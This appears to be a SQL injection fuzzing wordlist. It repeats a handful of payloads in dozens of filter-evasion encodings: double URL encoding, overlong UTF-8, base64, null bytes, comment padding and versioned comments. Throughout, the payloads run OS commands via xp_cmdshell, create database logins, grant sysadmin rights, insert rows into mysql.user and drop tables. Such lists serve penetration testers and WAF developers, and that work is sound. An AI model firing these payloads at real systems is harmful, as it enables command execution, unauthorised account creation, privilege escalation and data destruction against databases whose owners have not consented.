# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect
%00
IyB5b3Ugd2lsbCBuZWVkIHRvIGN1c3RvbWl6ZS9tb2RpZnkgc29tZSBvZiB0aGUgdmF1bGVzIGluIHRoZSBxdWVyaWVzIGZvciBiZXN0IGVmZmVjdAo=
# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

%2523%2520%2579%256F%2575%2520%2577%2569%256C%256C%2520%256E%2565%2565%2564%2520%2574%256F%2520%2563%2575%2573%2574%256F%256D%2569%257A%2565%252F%256D%256F%2564%2569%2566%2579%2520%2573%256F%256D%2565%2520%256F%2566%2520%2574%2568%2565%2520%2576%2561%2575%256C%2565%2573%2520%2569%256E%2520%2574%2568%2565%2520%2571%2575%2565%2572%2569%2565%2573%2520%2566%256F%2572%2520%2562%2565%2573%2574%2520%2565%2566%2566%2565%2563%2574%250A
%23%20%79%6F%75%20%77%69%6C%6C%20%6E%65%65%64%20%74%6F%20%63%75%73%74%6F%6D%69%7A%65%2F%6D%6F%64%69%66%79%20%73%6F%6D%65%20%6F%66%20%74%68%65%20%76%61%75%6C%65%73%20%69%6E%20%74%68%65%20%71%75%65%72%69%65%73%20%66%6F%72%20%62%65%73%74%20%65%66%66%65%63%74%0A
%u0023%u0020%u0079%u006F%u0075%u0020%u0077%u0069%u006C%u006C%u0020%u006E%u0065%u0065%u0064%u0020%u0074%u006F%u0020%u0063%u0075%u0073%u0074%u006F%u006D%u0069%u007A%u0065%u002F%u006D%u006F%u0064%u0069%u0066%u0079%u0020%u0073%u006F%u006D%u0065%u0020%u006F%u0066%u0020%u0074%u0068%u0065%u0020%u0076%u0061%u0075%u006C%u0065%u0073%u0020%u0069%u006E%u0020%u0074%u0068%u0065%u0020%u0071%u0075%u0065%u0072%u0069%u0065%u0073%u0020%u0066%u006F%u0072%u0020%u0062%u0065%u0073%u0074%u0020%u0065%u0066%u0066%u0065%u0063%u0074%u000A
# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

%C0%AB%C0%AAyou%C0%AAwill%C0%AAneed%C0%AAto%C0%AAcustomize%C0%AFmodify%C0%AAsome%C0%AAof%C0%AAthe%C0%AAvaules%C0%AAin%C0%AAthe%C0%AAqueries%C0%AAfor%C0%AAbest%C0%AAeffect%C0%8A
%# %y%o%u %w%i%l%l %n%e%e%d %t%o %c%u%s%t%o%m%i%z%e%/%m%o%d%i%f%y %s%o%m%e %o%f %t%h%e %v%a%u%l%e%s %i%n %t%h%e %q%u%e%r%i%e%s %f%o%r %b%e%s%t %e%f%f%e%c%t%

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect
 and '0having'='0having'
# you will need to customize/modify some of the vaules in the queries for best effect
sp_password
#/**/you/**/will/**/need/**/to/**/customize/modify/**/some/**/of/**/the/**/vaules/**/in/**/the/**/queries/**/for/**/best/**/effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

#%01you%02will%0Dneed%08to%09customize/modify%0Csome%09of%0Athe%0Fvaules%0Din%04the%05queries%0Cfor%03best%01effect

# you will need to customize/modify some of the vaules in the queries for best effect

#%0Cyou%0Cwill%0Cneed%0Cto%09customize/modify%0Csome%0Dof%0Dthe%0Bvaules%0Din%0Bthe%0Aqueries%0Bfor%0Bbest%0Beffect

# you will need to customize/modify some of the vaules in the queries for best effect

#+you+will+need+to+customize/modify+some+of+the+vaules+in+the+queries+for+best+effect

#%09you%0Awill%0Dneed%09to%0Acustomize/modify%0Csome%09of%0Dthe%0Cvaules%0Cin%0Athe%09queries%0Dfor%0Cbest%09effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

# you will need to customize/modify some of the vaules in the queries for best effect

%EF%BC%87; exec master..xp_cmdshell %EF%BC%87ping 10.10.1.2%EF%BC%87--

%00%27; exec master..xp_cmdshell %00%27ping 10.10.1.2%00%27--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--
%00
JzsgZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdwaW5nIDEwLjEwLjEuMictLQo=
'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

%2527%253B%2520%2565%2578%2565%2563%2520%256D%2561%2573%2574%2565%2572%252E%252E%2578%2570%255F%2563%256D%2564%2573%2568%2565%256C%256C%2520%2527%2570%2569%256E%2567%2520%2531%2530%252E%2531%2530%252E%2531%252E%2532%2527%252D%252D%250A
%27%3B%20%65%78%65%63%20%6D%61%73%74%65%72%2E%2E%78%70%5F%63%6D%64%73%68%65%6C%6C%20%27%70%69%6E%67%20%31%30%2E%31%30%2E%31%2E%32%27%2D%2D%0A
%u0027%u003B%u0020%u0065%u0078%u0065%u0063%u0020%u006D%u0061%u0073%u0074%u0065%u0072%u002E%u002E%u0078%u0070%u005F%u0063%u006D%u0064%u0073%u0068%u0065%u006C%u006C%u0020%u0027%u0070%u0069%u006E%u0067%u0020%u0031%u0030%u002E%u0031%u0030%u002E%u0031%u002E%u0032%u0027%u002D%u002D%u000A
'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; /*!30231exec master..xp_cmdshell 'ping 10.10.1.2'*/--

'; /*!00000exec master..xp_cmdshell 'ping 10.10.1.2'*/--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

%C0%AF%C0%BB%C0%AAexec%C0%AAmaster%C0%AE%C0%AExp%C0%DFcmdshell%C0%AA%C0%AFping%C0%AA10%C0%AE10%C0%AE1%C0%AE2%C0%AF%C0%AF%C0%AF%C0%8A
%'%; %e%x%e%c %m%a%s%t%e%r%.%.%x%p%_%c%m%d%s%h%e%l%l %'%p%i%n%g %1%0%.%1%0%.%1%.%2%'%-%-%

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--
 and '0having'='0having'
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
-- sp_password
';/**/exec/**/master..xp_cmdshell/**/'ping 10.10.1.2'--

';--mtZVWqeurC%0Aexec--JAQHqAehbMs%0Amaster..xp_cmdshell--ymAOYyu%0A'ping--gXHWDXgl%0A10.10.1.2'----HqFVfosQG%0A
';%23ykDYMq%0Aexec%23AslKxuafR%0Amaster..xp_cmdshell%23BuGToe%0A'ping%23TuXryqpwuKvp%0A10.10.1.2'--%23cJFNjGVQ%0A
';%23PUdIdbBPUMSL%0Aexec%23mRbZQwFOa%0Amaster..xp_cmdshell%23jWytUc%0A'ping%23NJqfifr%0A10.10.1.2'--%23VsRAzGE%0A
';%0Dexec%08master..xp_cmdshell%0F'ping 10.10.1.2'--

';%23%0Aexec%23%0Amaster..xp_cmdshell%23%0A'ping%23%0A10.10.1.2'--%23%0A
';%0Aexec%09master..xp_cmdshell%09'ping 10.10.1.2'--

';--%0Aexec--%0Amaster..xp_cmdshell--%0A'ping--%0A10.10.1.2'----%0A
';+exec+master..xp_cmdshell+'ping 10.10.1.2'--

';%09exec%0Amaster..xp_cmdshell%0A'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

%bf%27; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

%EF%BC%87create user name identified by %EF%BC%87pass123%EF%BC%87 --

%00%27create user name identified by %00%27pass123%00%27 --

'create user name identified by 'pass123' --
%00
J2NyZWF0ZSB1c2VyIG5hbWUgaWRlbnRpZmllZCBieSAncGFzczEyMycgLS0K
'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

%2527%2563%2572%2565%2561%2574%2565%2520%2575%2573%2565%2572%2520%256E%2561%256D%2565%2520%2569%2564%2565%256E%2574%2569%2566%2569%2565%2564%2520%2562%2579%2520%2527%2570%2561%2573%2573%2531%2532%2533%2527%2520%252D%252D%250A
%27%63%72%65%61%74%65%20%75%73%65%72%20%6E%61%6D%65%20%69%64%65%6E%74%69%66%69%65%64%20%62%79%20%27%70%61%73%73%31%32%33%27%20%2D%2D%0A
%u0027%u0063%u0072%u0065%u0061%u0074%u0065%u0020%u0075%u0073%u0065%u0072%u0020%u006E%u0061%u006D%u0065%u0020%u0069%u0064%u0065%u006E%u0074%u0069%u0066%u0069%u0065%u0064%u0020%u0062%u0079%u0020%u0027%u0070%u0061%u0073%u0073%u0031%u0032%u0033%u0027%u0020%u002D%u002D%u000A
'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create /*!30314user name identified by 'pass123' */--

'create /*!00000user name identified by 'pass123' */--

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

%C0%AFcreate%C0%AAuser%C0%AAname%C0%AAidentified%C0%AAby%C0%AA%C0%AFpass123%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%c%r%e%a%t%e %u%s%e%r %n%a%m%e %i%d%e%n%t%i%f%i%e%d %b%y %'%p%a%s%s%1%2%3%' %-%-%

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --
 and '0having'='0having'
'create user name identified by 'pass123' --
-- sp_password
'create/**/user/**/name/**/identified/**/by/**/'pass123'/**/--

'create--PHTrvKpscrrS%0Auser--PpqDZhCT%0Aname--dTSGUtnuHmo%0Aidentified--ZhwqggKhtyek%0Aby--MVQMtTEN%0A'pass123'--vaQzYyiQWPfK%0A----xFcBhPGbiSs%0A
'create%23bWeStSVMsu%0Auser%23omCLwuFUe%0Aname%23anevQfA%0Aidentified%23gHanITXL%0Aby%23KjfZBdn%0A'pass123'%23hdZzWjOwv%0A--%23TUltmfVZmI%0A
'create%23vWsPxVBlrpCr%0Auser%23CIwGmykL%0Aname%23xFsmGrbjGpMO%0Aidentified%23IQzxPYpO%0Aby%23GqyrTSEDtM%0A'pass123'%23eDyJkvcIX%0A--%23bNquAzJaYsY%0A
'create%06user%05name%0Didentified%07by%0D'pass123'%0C--

'create%23%0Auser%23%0Aname%23%0Aidentified%23%0Aby%23%0A'pass123'%23%0A--%23%0A
'create%0Cuser%0Dname%0Cidentified%0Aby%09'pass123'%0B--

'create--%0Auser--%0Aname--%0Aidentified--%0Aby--%0A'pass123'--%0A----%0A
'create+user+name+identified+by+'pass123'+--

'create%09user%0Dname%0Aidentified%0Cby%0A'pass123'%09--

'create user name identified by 'pass123' --

%bf%27create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

'create user name identified by 'pass123' --

%EF%BC%87create user name identified by pass123 temporary tablespace temp default tablespace users; 

%00%27create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 
%00
J2NyZWF0ZSB1c2VyIG5hbWUgaWRlbnRpZmllZCBieSBwYXNzMTIzIHRlbXBvcmFyeSB0YWJsZXNwYWNlIHRlbXAgZGVmYXVsdCB0YWJsZXNwYWNlIHVzZXJzOyAK
'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

%2527%2563%2572%2565%2561%2574%2565%2520%2575%2573%2565%2572%2520%256E%2561%256D%2565%2520%2569%2564%2565%256E%2574%2569%2566%2569%2565%2564%2520%2562%2579%2520%2570%2561%2573%2573%2531%2532%2533%2520%2574%2565%256D%2570%256F%2572%2561%2572%2579%2520%2574%2561%2562%256C%2565%2573%2570%2561%2563%2565%2520%2574%2565%256D%2570%2520%2564%2565%2566%2561%2575%256C%2574%2520%2574%2561%2562%256C%2565%2573%2570%2561%2563%2565%2520%2575%2573%2565%2572%2573%253B%2520%250A
%27%63%72%65%61%74%65%20%75%73%65%72%20%6E%61%6D%65%20%69%64%65%6E%74%69%66%69%65%64%20%62%79%20%70%61%73%73%31%32%33%20%74%65%6D%70%6F%72%61%72%79%20%74%61%62%6C%65%73%70%61%63%65%20%74%65%6D%70%20%64%65%66%61%75%6C%74%20%74%61%62%6C%65%73%70%61%63%65%20%75%73%65%72%73%3B%20%0A
%u0027%u0063%u0072%u0065%u0061%u0074%u0065%u0020%u0075%u0073%u0065%u0072%u0020%u006E%u0061%u006D%u0065%u0020%u0069%u0064%u0065%u006E%u0074%u0069%u0066%u0069%u0065%u0064%u0020%u0062%u0079%u0020%u0070%u0061%u0073%u0073%u0031%u0032%u0033%u0020%u0074%u0065%u006D%u0070%u006F%u0072%u0061%u0072%u0079%u0020%u0074%u0061%u0062%u006C%u0065%u0073%u0070%u0061%u0063%u0065%u0020%u0074%u0065%u006D%u0070%u0020%u0064%u0065%u0066%u0061%u0075%u006C%u0074%u0020%u0074%u0061%u0062%u006C%u0065%u0073%u0070%u0061%u0063%u0065%u0020%u0075%u0073%u0065%u0072%u0073%u003B%u0020%u000A
'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create /*!30418user name identified by pass123 temporary tablespace temp default tablespace users; 
*/
'create /*!00000user name identified by pass123 temporary tablespace temp default tablespace users; 
*/
'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

%C0%AFcreate%C0%AAuser%C0%AAname%C0%AAidentified%C0%AAby%C0%AApass123%C0%AAtemporary%C0%AAtablespace%C0%AAtemp%C0%AAdefault%C0%AAtablespace%C0%AAusers%C0%BB%C0%AA%C0%8A
%'%c%r%e%a%t%e %u%s%e%r %n%a%m%e %i%d%e%n%t%i%f%i%e%d %b%y %p%a%s%s%1%2%3 %t%e%m%p%o%r%a%r%y %t%a%b%l%e%s%p%a%c%e %t%e%m%p %d%e%f%a%u%l%t %t%a%b%l%e%s%p%a%c%e %u%s%e%r%s%; %

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 
 and '0having'='0having'
'create user name identified by pass123 temporary tablespace temp default tablespace users; 
-- sp_password
'create/**/user/**/name/**/identified/**/by/**/pass123/**/temporary/**/tablespace/**/temp/**/default/**/tablespace/**/users;/**/

'create--oJMKEl%0Auser--ejTOeZGbJY%0Aname--teRABk%0Aidentified--FjrWAM%0Aby--HNnqxC%0Apass123--ziIvfuL%0Atemporary--DnQcfiHocQxV%0Atablespace--iviYVyNadkZ%0Atemp--MzoesVm%0Adefault--hlmMlhJfdyW%0Atablespace--knRIfovj%0Ausers;--fLSSFQR%0A--GerOoj%0A
'create%23XccecIC%0Auser%23sRgVrpUOHk%0Aname%23HhduHCxj%0Aidentified%23TpOXUWuv%0Aby%23jIAbYf%0Apass123%23PTKgDBl%0Atemporary%23fAtaJTvJuTg%0Atablespace%23tGuiaBV%0Atemp%23lXxSXHV%0Adefault%23sZgRemOiTY%0Atablespace%23zuglEB%0Ausers;%23OMPgSuwFickq%0A%23xnndUQQuYnua%0A
'create%23yaKguP%0Auser%23lIpCVbgphA%0Aname%23eIkgxqVMvY%0Aidentified%23WwtCzu%0Aby%23BqYLbjiV%0Apass123%23wysGELgmfCvH%0Atemporary%23VaaZAg%0Atablespace%23uRKdFc%0Atemp%23qSFUOJSn%0Adefault%23IkAyJEsW%0Atablespace%23OMdATZDtJ%0Ausers;%23uoamGi%0A%23RmpsoOTwH%0A
'create%02user%03name%0Bidentified%0Dby%0Epass123%01temporary%0Atablespace%0Ftemp%0Edefault%06tablespace%09users;%0A

'create%23%0Auser%23%0Aname%23%0Aidentified%23%0Aby%23%0Apass123%23%0Atemporary%23%0Atablespace%23%0Atemp%23%0Adefault%23%0Atablespace%23%0Ausers;%23%0A%23%0A
'create%0Buser%0Bname%0Bidentified%0Aby%09pass123%0Dtemporary%0Ctablespace%09temp%0Adefault%09tablespace%09users;%0C

'create--%0Auser--%0Aname--%0Aidentified--%0Aby--%0Apass123--%0Atemporary--%0Atablespace--%0Atemp--%0Adefault--%0Atablespace--%0Ausers;--%0A--%0A
'create+user+name+identified+by+pass123+temporary+tablespace+temp+default+tablespace+users;+

'create%0Cuser%0Cname%0Aidentified%0Aby%0Cpass123%0Dtemporary%0Dtablespace%0Dtemp%0Cdefault%0Ctablespace%0Ausers;%0C

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

%bf%27create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

'create user name identified by pass123 temporary tablespace temp default tablespace users; 

%EF%BC%87 ; drop table temp --

%00%27 ; drop table temp --

' ; drop table temp --
%00
JyA7IGRyb3AgdGFibGUgdGVtcCAtLQo=
' ; drop table temp --

' ; drop table temp --

%2527%2520%253B%2520%2564%2572%256F%2570%2520%2574%2561%2562%256C%2565%2520%2574%2565%256D%2570%2520%252D%252D%250A
%27%20%3B%20%64%72%6F%70%20%74%61%62%6C%65%20%74%65%6D%70%20%2D%2D%0A
%u0027%u0020%u003B%u0020%u0064%u0072%u006F%u0070%u0020%u0074%u0061%u0062%u006C%u0065%u0020%u0074%u0065%u006D%u0070%u0020%u002D%u002D%u000A
' ; drop table temp --

' ; drop table temp --

' ; drop table temp --

' ; drop table temp --

' ; drop table temp --

' ; drop table temp --

' /*!30172; drop table temp */--

' /*!00000; drop table temp */--

' ; drop table temp --

' ; drop table temp --

%C0%AF%C0%AA%C0%BB%C0%AAdrop%C0%AAtable%C0%AAtemp%C0%AA%C0%AF%C0%AF%C0%8A
%' %; %d%r%o%p %t%a%b%l%e %t%e%m%p %-%-%

' ; drop table temp --

' ; drop table temp --

' ; drop table temp --
 and '0having'='0having'
' ; drop table temp --
-- sp_password
'/**/;/**/drop/**/table/**/temp/**/--

'--WPzyuNRkIGg%0A;--nzIosSnppmP%0Adrop--xSVAIN%0Atable--ZaliUCHjQY%0Atemp--wxMDUzrkx%0A----kwGJTbpBf%0A
'%23UshxLZktP%0A;%23dTypkyG%0Adrop%23guKpJrXhrPR%0Atable%23RIVDiKKjt%0Atemp%23RjXVyIVFQhU%0A--%23hbysPYt%0A
'%23bTWwIWACbYvy%0A;%23tNDGBWYkzpHm%0Adrop%23npMKPoOp%0Atable%23pkQDma%0Atemp%23qszHSo%0A--%23nkMooXURgE%0A
'%0A;%02drop%0Ctable%03temp%0D--

'%23%0A;%23%0Adrop%23%0Atable%23%0Atemp%23%0A--%23%0A
'%0D;%0Adrop%0Dtable%0Ctemp%09--

'--%0A;--%0Adrop--%0Atable--%0Atemp--%0A----%0A
'+;+drop+table+temp+--

'%09;%0Adrop%09table%0Dtemp%0D--

' ; drop table temp --

%bf%27 ; drop table temp --

' ; drop table temp --

' ; drop table temp --

' ; drop table temp --

' ; drop table temp --

%EF%BC%87exec sp_addlogin %EF%BC%87name%EF%BC%87 , %EF%BC%87password%EF%BC%87 --

%00%27exec sp_addlogin %00%27name%00%27 , %00%27password%00%27 --

'exec sp_addlogin 'name' , 'password' --
%00
J2V4ZWMgc3BfYWRkbG9naW4gJ25hbWUnICwgJ3Bhc3N3b3JkJyAtLQo=
'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

%2527%2565%2578%2565%2563%2520%2573%2570%255F%2561%2564%2564%256C%256F%2567%2569%256E%2520%2527%256E%2561%256D%2565%2527%2520%252C%2520%2527%2570%2561%2573%2573%2577%256F%2572%2564%2527%2520%252D%252D%250A
%27%65%78%65%63%20%73%70%5F%61%64%64%6C%6F%67%69%6E%20%27%6E%61%6D%65%27%20%2C%20%27%70%61%73%73%77%6F%72%64%27%20%2D%2D%0A
%u0027%u0065%u0078%u0065%u0063%u0020%u0073%u0070%u005F%u0061%u0064%u0064%u006C%u006F%u0067%u0069%u006E%u0020%u0027%u006E%u0061%u006D%u0065%u0027%u0020%u002C%u0020%u0027%u0070%u0061%u0073%u0073%u0077%u006F%u0072%u0064%u0027%u0020%u002D%u002D%u000A
'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec /*!30337sp_addlogin 'name' , 'password' */--

'exec /*!00000sp_addlogin 'name' , 'password' */--

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

%C0%AFexec%C0%AAsp%C0%DFaddlogin%C0%AA%C0%AFname%C0%AF%C0%AA%C0%AE%C0%AA%C0%AFpassword%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%e%x%e%c %s%p%_%a%d%d%l%o%g%i%n %'%n%a%m%e%' %, %'%p%a%s%s%w%o%r%d%' %-%-%

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --
 and '0having'='0having'
'exec sp_addlogin 'name' , 'password' --
-- sp_password
'exec/**/sp_addlogin/**/'name'/**/,/**/'password'/**/--

'exec--jLgVEzRQYW%0Asp_addlogin--tHxLkayRs%0A'name'--GKcjcSYwldTD%0A,--HPoUjMoU%0A'password'--zHeQLakYGb%0A----XLVNsBCsSG%0A
'exec%23ClGcsIL%0Asp_addlogin%23fQIuMNEUNr%0A'name'%23xxjEhXULJR%0A,%23ZqnwrfHB%0A'password'%23WNmUEbzf%0A--%23GELcnFvD%0A
'exec%23KxUesGRVlJ%0Asp_addlogin%23apPpbDfVNOR%0A'name'%23qCzCPTHWmhFy%0A,%23DdGWFfyX%0A'password'%23GAxsuMlAeyBa%0A--%23aVgtuEIFzUNA%0A
'exec%0Asp_addlogin%01'name'%0A,%0A'password'%04--

'exec%23%0Asp_addlogin%23%0A'name'%23%0A,%23%0A'password'%23%0A--%23%0A
'exec%0Csp_addlogin%0A'name'%0C,%09'password'%0C--

'exec--%0Asp_addlogin--%0A'name'--%0A,--%0A'password'--%0A----%0A
'exec+sp_addlogin+'name'+,+'password'+--

'exec%0Dsp_addlogin%09'name'%0A,%0D'password'%09--

'exec sp_addlogin 'name' , 'password' --

%bf%27exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

'exec sp_addlogin 'name' , 'password' --

%EF%BC%87 exec sp_addsrvrolemember %EF%BC%87name%EF%BC%87 , %EF%BC%87sysadmin%EF%BC%87 --

%00%27 exec sp_addsrvrolemember %00%27name%00%27 , %00%27sysadmin%00%27 --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --
%00
JyBleGVjIHNwX2FkZHNydnJvbGVtZW1iZXIgJ25hbWUnICwgJ3N5c2FkbWluJyAtLQo=
' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

%2527%2520%2565%2578%2565%2563%2520%2573%2570%255F%2561%2564%2564%2573%2572%2576%2572%256F%256C%2565%256D%2565%256D%2562%2565%2572%2520%2527%256E%2561%256D%2565%2527%2520%252C%2520%2527%2573%2579%2573%2561%2564%256D%2569%256E%2527%2520%252D%252D%250A
%27%20%65%78%65%63%20%73%70%5F%61%64%64%73%72%76%72%6F%6C%65%6D%65%6D%62%65%72%20%27%6E%61%6D%65%27%20%2C%20%27%73%79%73%61%64%6D%69%6E%27%20%2D%2D%0A
%u0027%u0020%u0065%u0078%u0065%u0063%u0020%u0073%u0070%u005F%u0061%u0064%u0064%u0073%u0072%u0076%u0072%u006F%u006C%u0065%u006D%u0065%u006D%u0062%u0065%u0072%u0020%u0027%u006E%u0061%u006D%u0065%u0027%u0020%u002C%u0020%u0027%u0073%u0079%u0073%u0061%u0064%u006D%u0069%u006E%u0027%u0020%u002D%u002D%u000A
' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' /*!30197exec sp_addsrvrolemember 'name' , 'sysadmin' */--

' /*!00000exec sp_addsrvrolemember 'name' , 'sysadmin' */--

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

%C0%AF%C0%AAexec%C0%AAsp%C0%DFaddsrvrolemember%C0%AA%C0%AFname%C0%AF%C0%AA%C0%AE%C0%AA%C0%AFsysadmin%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%' %e%x%e%c %s%p%_%a%d%d%s%r%v%r%o%l%e%m%e%m%b%e%r %'%n%a%m%e%' %, %'%s%y%s%a%d%m%i%n%' %-%-%

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --
 and '0having'='0having'
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
-- sp_password
'/**/exec/**/sp_addsrvrolemember/**/'name'/**/,/**/'sysadmin'/**/--

'--fyvauladzFHx%0Aexec--cBArziSQq%0Asp_addsrvrolemember--bDkeGjjhgP%0A'name'--qnpECNGQX%0A,--aPdSAbYqFf%0A'sysadmin'--NPMYOGM%0A----JHBxXignvkS%0A
'%23DcvSsQdluN%0Aexec%23zoWTcphUm%0Asp_addsrvrolemember%23TXXSVQrOIEBT%0A'name'%23YNpTAaY%0A,%23GqdkmsAr%0A'sysadmin'%23WKaiEvwu%0A--%23dSSXqShxRTgU%0A
'%23fBKmmdFGDYYc%0Aexec%23jrpasTpot%0Asp_addsrvrolemember%23DKYHPKMn%0A'name'%23WKCWDU%0A,%23zDBRVl%0A'sysadmin'%23fYJjiM%0A--%23QngEqf%0A
'%0Fexec%02sp_addsrvrolemember%05'name'%04,%04'sysadmin'%0D--

'%23%0Aexec%23%0Asp_addsrvrolemember%23%0A'name'%23%0A,%23%0A'sysadmin'%23%0A--%23%0A
'%0Aexec%0Dsp_addsrvrolemember%09'name'%0A,%09'sysadmin'%0D--

'--%0Aexec--%0Asp_addsrvrolemember--%0A'name'--%0A,--%0A'sysadmin'--%0A----%0A
'+exec+sp_addsrvrolemember+'name'+,+'sysadmin'+--

'%09exec%0Asp_addsrvrolemember%0D'name'%0D,%09'sysadmin'%0C--

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

%bf%27 exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

' exec sp_addsrvrolemember 'name' , 'sysadmin' --

%EF%BC%87 insert into mysql.user (user, host, password) values (%EF%BC%87name%EF%BC%87, %EF%BC%87localhost%EF%BC%87, password(%EF%BC%87pass123%EF%BC%87)) --

%00%27 insert into mysql.user (user, host, password) values (%00%27name%00%27, %00%27localhost%00%27, password(%00%27pass123%00%27)) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
%00
JyBpbnNlcnQgaW50byBteXNxbC51c2VyICh1c2VyLCBob3N0LCBwYXNzd29yZCkgdmFsdWVzICgnbmFtZScsICdsb2NhbGhvc3QnLCBwYXNzd29yZCgncGFzczEyMycpKSAtLQo=
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

